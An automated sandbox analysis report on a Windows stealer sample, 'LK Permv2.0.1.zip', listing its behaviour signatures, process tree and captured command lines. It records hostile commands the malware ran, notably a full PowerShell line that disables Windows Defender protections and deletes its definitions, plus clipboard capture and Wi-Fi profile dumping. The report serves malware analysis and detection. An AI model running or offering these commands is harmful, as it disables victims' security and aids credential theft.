Malware Analysis Report

2025-04-03 14:11

Sample ID 241104-s6ffaavmgq
Target LK Permv2.0.1.zip
SHA256 266b8efffa3749a8b68e0fca0141006920bacdf3ad5bad9d7640fa83f03aae0e
Tags
collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
score
7/10


Analysis Overview

score
7/10

SHA256

266b8efffa3749a8b68e0fca0141006920bacdf3ad5bad9d7640fa83f03aae0e

Threat Level: Shows suspicious behavior

The file LK Permv2.0.1.zip was found to show suspicious behavior.

Malicious Activity Summary

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Executes dropped EXE

Clipboard Data

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Obfuscated Files or Information: Command Obfuscation

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Enumerates processes with tasklist

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Embeds OpenSSL

Enumerates physical storage devices

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Gathers system information

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported

2024-11-04 15:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 15:44

Reported

2024-11-04 15:47

Platform

win11-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LKPerm.exe"

Signatures

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\LKPerm2.vpunpun C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Browser Information Discovery

discovery

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4800 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\LKPerm.exe C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe
PID 4800 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\LKPerm.exe C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe
PID 3544 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe C:\Windows\system32\cmd.exe
PID 3544 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe
PID 2112 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe
PID 2112 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe
PID 2112 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe
PID 2112 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe
PID 3344 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe
PID 1688 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 5012 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe
PID 5012 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe
PID 1688 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 3536 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe
PID 3536 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe
PID 3080 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3080 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3300 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3300 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3780 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3780 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1016 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1016 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1456 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1456 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4984 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1176 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1688 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3532 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3532 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4896 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4924 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe

Processes

C:\Users\Admin\AppData\Local\Temp\LKPerm.exe

"C:\Users\Admin\AppData\Local\Temp\LKPerm.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe

C:\Users\Admin\AppData\Local\Temp\LKPerm.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "plugin\run.bat"

C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe

"C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe"

C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe

"C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe"

C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe

C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe

C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe

C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe

C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

